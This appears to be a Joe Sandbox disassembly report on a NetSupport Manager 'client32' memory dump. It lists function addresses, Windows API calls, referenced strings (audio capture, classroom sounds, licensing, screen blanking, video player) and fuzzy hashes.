Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
API String ID: 1843377891-2362500394
Opcode ID: b945757a71138b391f2906fc9e17844ebb842f782faf2e91cfed3de9f79adea5
Instruction ID: 85dc8e46805702255dcb094290c4b37000c5ec094fd01c80967026a15f69f654
Opcode Fuzzy Hash: b945757a71138b391f2906fc9e17844ebb842f782faf2e91cfed3de9f79adea5
Instruction Fuzzy Hash: 1D51D6B9E04A46AFE704DF64DC80B9EF7A8FB04369F10467EE91993640E731765087A1

Function 11121220 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 270threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(0000001C), ref: 1112129E
GetCurrentThreadId.KERNEL32 ref: 111212D5
GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111214CA
GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111214F3

Strings

LimitColorbits, xrefs: 11121321
View, xrefs: 1112132F, 1112142F, 11121517, 1112152B, 11121545, 11121563, 1112158F, 111215A3
IgnoreScrape, xrefs: 1112158A
ShowBigBlits, xrefs: 11121512
LegacyScrape, xrefs: 1112159E
MaxLag, xrefs: 1112155E
Show, xrefs: 11121496
ScaleToFitMode, xrefs: 11121526
ScaleToFitTilingFactor, xrefs: 11121540
NSMRemote32, xrefs: 111214C5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
API String ID: 3042533059-2538903574
Opcode ID: 0c1918b46943ad23ca24d4023d9c83c59d33232a7ccf962deb2fd2ba01399400
Instruction ID: 450f01cdc74338d50b1639c7b2f8e4703eedc47399d2e1cb68d0c2ecfed8e7e3
Opcode Fuzzy Hash: 0c1918b46943ad23ca24d4023d9c83c59d33232a7ccf962deb2fd2ba01399400
Instruction Fuzzy Hash: E1B18CB8A00745AFDB60CF65CC84B9BFBF5AF84308F50896EE55A97240EB30A540CF51

Function 110414A0 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202processCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1104163C
wsprintfA.USER32 ref: 1104166E
wsprintfA.USER32 ref: 110416B9
_memset.LIBCMT ref: 110416C6
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 110416FE
CloseHandle.KERNEL32(?), ref: 11041715
CloseHandle.KERNEL32(?), ref: 1104171E

Part of subcall function 11094B60: LoadLibraryA.KERNEL32(USER32,?,?,1111613C), ref: 11094B69
Part of subcall function 11094B60: GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 11094B7D
Part of subcall function 11094B60: GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 11094B8A
Part of subcall function 11094B60: GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 11094B97
Part of subcall function 11094B60: GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 11094BA4
Part of subcall function 11094B60: _memset.LIBCMT ref: 11094BB4

Part of subcall function 11094AB0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 11094ACD

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

Part of subcall function 11015440: GlobalAddAtomA.KERNEL32(NSMIdentifyWnd), ref: 11015456

Strings

StudentPicked.wav, xrefs: 1104161A
%sSounds\%s, xrefs: 1104160C, 1104162A
StudentSelected.wav, xrefs: 110415FC
D, xrefs: 110416F4
RandomSelect, xrefs: 11041553
%s %s, xrefs: 110416B3
%sPlaySound.exe, xrefs: 11041668

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProcwsprintf$_memset$CloseHandle$AtomCreateGlobalInfoLibraryLoadParametersProcessSystem_malloc
String ID: %s %s$%sPlaySound.exe$%sSounds\%s$D$RandomSelect$StudentPicked.wav$StudentSelected.wav
API String ID: 2251625640-3892444432
Opcode ID: bf8b49378f049f87f26fd6e30d91a44824a75d2b21c6d7b45db73734cdb22a16
Instruction ID: 065f75d96477fd0a98e1ab802b4e10e8851c147c252ba3949fb0dea8a991cb9f
Opcode Fuzzy Hash: bf8b49378f049f87f26fd6e30d91a44824a75d2b21c6d7b45db73734cdb22a16
Instruction Fuzzy Hash: A47197B5E4121EABEB21DB50DC81FDDB7B8AB04718F1041D5E609A71C0EA70BB44CF65

Function 110270D0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 174windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000,00000009,?,?,?,?,?,?,1102E5D6,?,?,View,Client,Bridge), ref: 11027160
LoadIconA.USER32(00000000,00007D0B), ref: 11027175
GetSystemMetrics.USER32(00000032), ref: 1102718E
GetSystemMetrics.USER32(00000031), ref: 11027193
LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 110271A3
LoadIconA.USER32(11000000,00000491), ref: 110271BB
GetSystemMetrics.USER32(00000032), ref: 110271CA
GetSystemMetrics.USER32(00000031), ref: 110271CF
LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 110271E0

Strings

NSM.LIC, xrefs: 110270E1
_License, xrefs: 1102710D
product, xrefs: 11027108
PCIRES, xrefs: 1102715B
AdminUserAcknowledge, xrefs: 1102723B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
String ID: AdminUserAcknowledge$NSM.LIC$PCIRES$_License$product
API String ID: 1946015-4092316048
Opcode ID: 79552c2543423f62f7d866570ef95865b621177092b99735c6026cb116710b4b
Instruction ID: 4d3aa306a4fc4e245e425526cd06d18cb91a572ade39775ead4cef6959447daf
Opcode Fuzzy Hash: 79552c2543423f62f7d866570ef95865b621177092b99735c6026cb116710b4b
Instruction Fuzzy Hash: C0512675E40717ABEB11CAA48C81F6FF6AD9F59708F504065FE05E7280EB70E905C7A2

Function 110F5470 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 158windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

ShowCursor.USER32(00000000), ref: 110F553D
OpenEventA.KERNEL32(00100000,00000000,NSBlankExit), ref: 110F554E
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5574
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5593
TranslateMessage.USER32(?), ref: 110F55A4
DispatchMessageA.USER32(?), ref: 110F55AD
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F55C1
CloseHandle.KERNEL32(?), ref: 110F55D4
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F55EC
TranslateMessage.USER32(?), ref: 110F5607
DispatchMessageA.USER32(?), ref: 110F5610
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F561F
ShowCursor.USER32(00000001), ref: 110F562D

Strings

NSBlankExit, xrefs: 110F5543

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CursorDispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_malloc_memsetwsprintf
String ID: NSBlankExit
API String ID: 106653750-773372720
Opcode ID: f3a7e51278b216e47ff62e4722ca7a0b7eb61c5ef42920f6394f5a06ddf50b8b
Instruction ID: 238f625f8da0abce433c805a6aa5db8d5324ac83f8945d82d1e05466efc265f7
Opcode Fuzzy Hash: f3a7e51278b216e47ff62e4722ca7a0b7eb61c5ef42920f6394f5a06ddf50b8b
Instruction Fuzzy Hash: 55510D72E4132AABDB10EF608CC5FEDB7B8EB44714F1005A9E615E7184EB74AA40CF61

Function 111031C0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 111031EE
EnterCriticalSection.KERNEL32(111EB5C4), ref: 111031F7
GetTickCount.KERNEL32 ref: 111031FD
GetTickCount.KERNEL32 ref: 11103250
LeaveCriticalSection.KERNEL32(111EB5C4), ref: 11103259
GetTickCount.KERNEL32 ref: 1110328A
LeaveCriticalSection.KERNEL32(111EB5C4), ref: 11103293
EnterCriticalSection.KERNEL32(111EB5C4), ref: 111032BC
LeaveCriticalSection.KERNEL32(111EB5C4,00000000,?,00000000), ref: 11103383

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

Part of subcall function 110EE9B0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103327,?), ref: 110EE9DB

Strings

Warning. simap lock held for %d ms, xrefs: 11103269, 111032A3
info. new psi(%d) = %x, xrefs: 11103371
Warning. took %d ms to get simap lock, xrefs: 11103209
psi, xrefs: 11103243, 111032F8, 1110333E
e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 1110323E, 111032F3, 11103339

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
API String ID: 1574099134-3013461081
Opcode ID: 81bad8d16298332ca8d6600bafc183dff044167884f6840c03b6c1dc1b7383a8
Instruction ID: 89832f748e922a403c2406022f27e5a031cf170e04c986d8c3432455018c83f9
Opcode Fuzzy Hash: 81bad8d16298332ca8d6600bafc183dff044167884f6840c03b6c1dc1b7383a8
Instruction Fuzzy Hash: 1E41C479E1465AAFCB01DFA59C84EEFFBB5AF04358B404526F905E7640EA30A900CBA1

Function 11047530 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 137processwindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110475B6
WinExec.KERNEL32(?,00000001), ref: 1104762F
CloseHandle.KERNEL32(?), ref: 11047651
CloseHandle.KERNEL32(?), ref: 1104765A
IsWindow.USER32(00000000), ref: 1104766C
GetLastError.KERNEL32 ref: 11047697
IsWindow.USER32(00000000), ref: 110476C9
PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 110476DA

Part of subcall function 11140F70: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11190A88), ref: 11140FDD
Part of subcall function 11140F70: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110C55B), ref: 1114101E
Part of subcall function 11140F70: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114107B

Strings

DoShowVideo - could not find %s window, xrefs: 1104767B
pcivideovi.exe /X, xrefs: 1104757D
PCIVideoSlave32, xrefs: 11047676
D, xrefs: 110475C6
Failed to load player (%d), xrefs: 1104769E
ShowVideo, xrefs: 110475C1

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseFolderHandlePathWindow$ErrorExecFileLastMessageModuleNamePost_memset
String ID: D$DoShowVideo - could not find %s window$Failed to load player (%d)$PCIVideoSlave32$ShowVideo$pcivideovi.exe /X
API String ID: 2703108677-1914331637
Opcode ID: 82804b2da0bfa7b9fbec4a48a92b77f6e9497cef3618a94a2c94943b127ce1b5
Instruction ID: a90dc50c87a326d97a74718224d21f643bd0c08341bee09a7a0a5584cda26901
Opcode Fuzzy Hash: 82804b2da0bfa7b9fbec4a48a92b77f6e9497cef3618a94a2c94943b127ce1b5
Instruction Fuzzy Hash: 7841B634E0062A9FD710DF64CC85FDDF7E9AF48709F1080A5E9199B281EB71A984CB95

Function 1111D5A0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 1111B7E0: SelectPalette.GDI32(?,?,00000000), ref: 1111B85C
Part of subcall function 1111B7E0: SelectPalette.GDI32(?,?,00000000), ref: 1111B871
Part of subcall function 1111B7E0: DeleteObject.GDI32(?), ref: 1111B884
Part of subcall function 1111B7E0: DeleteObject.GDI32(?), ref: 1111B891
Part of subcall function 1111B7E0: DeleteObject.GDI32(?), ref: 1111B8B6

_free.LIBCMT ref: 1111D5BD

Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2DB
Part of subcall function 1115F2C5: GetLastError.KERNEL32(00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2ED

_free.LIBCMT ref: 1111D5D3
_free.LIBCMT ref: 1111D5E8
GdiFlush.GDI32(?,?,?,023C8DF8), ref: 1111D5F0
_free.LIBCMT ref: 1111D5FD
_free.LIBCMT ref: 1111D611
SelectObject.GDI32(?,?), ref: 1111D62D
DeleteObject.GDI32(?), ref: 1111D63A
GetLastError.KERNEL32(?,?,?,?,?,023C8DF8), ref: 1111D644
DeleteDC.GDI32(?), ref: 1111D66B
ReleaseDC.USER32(?,?), ref: 1111D67E
DeleteDC.GDI32(?), ref: 1111D68B
InterlockedDecrement.KERNEL32(111E49C8), ref: 1111D698

Strings

Error deleting membm, e=%d, xrefs: 1111D64B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
String ID: Error deleting membm, e=%d
API String ID: 3195047866-709490903
Opcode ID: a8e9fa6b2795ce8f004b42856998b5ecb2ec031948f27f0d7e8eba9680f91402
Instruction ID: 76bf48e3e7e8e91d844ddee7a87d69e6379bacc928fcefcccecbf19e1705c5f1
Opcode Fuzzy Hash: a8e9fa6b2795ce8f004b42856998b5ecb2ec031948f27f0d7e8eba9680f91402
Instruction Fuzzy Hash: 292156B9500B02ABD251ABB5D8C8B9FF3E4EF88349F50491DE5AA87204DB34F401CB66

Function 110A7370 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 110A7396
CreateCompatibleDC.GDI32(00000000), ref: 110A73A2
GetRgnBox.GDI32(?,11048879), ref: 110A73C3
CreateCompatibleBitmap.GDI32(?,?,00000005), ref: 110A73E2
SelectObject.GDI32(00000000,00000000), ref: 110A73F8
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000005,00FF0062), ref: 110A7427
OffsetRgn.GDI32(00000000,?,00000005), ref: 110A7442
SelectClipRgn.GDI32(00000000,00000000), ref: 110A7453
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000005,00CC0020), ref: 110A7473
SelectObject.GDI32(00000000,?), ref: 110A747E
DeleteDC.GDI32(00000000), ref: 110A7485
ReleaseDC.USER32(00000000,00000000), ref: 110A7491

Strings

@Ls, xrefs: 110A73A2

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Select$CompatibleCreateObject$BitmapClipDeleteOffsetRelease
String ID: @Ls
API String ID: 1998184411-4225762999
Opcode ID: 6375b4158c81d5b49bc7bff17e44be9fdc0846eb939fc4591ffaa5725bfe132d
Instruction ID: e3d1c8e06de52d48e22b4a072d63f707989114a953e21c7997a81ce814526253
Opcode Fuzzy Hash: 6375b4158c81d5b49bc7bff17e44be9fdc0846eb939fc4591ffaa5725bfe132d
Instruction Fuzzy Hash: B141F975A00216AFD715CFA4C885EBEBBB9EB8C704F108119FA16A3244CB35AC01CB61

Function 110CD5C0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 113windowCOMMON

Download Yara Rule

APIs

GetStretchBltMode.GDI32(?,?,?,1101C9B1,?,00000002,?), ref: 110CD5F8
SetStretchBltMode.GDI32(?,00000004), ref: 110CD606
GetDC.USER32(00000000), ref: 110CD60E
CreateCompatibleDC.GDI32(00000000), ref: 110CD617
CreateCompatibleBitmap.GDI32(00000000,00000280,000001E0), ref: 110CD62A
SelectObject.GDI32(00000000,00000000), ref: 110CD635
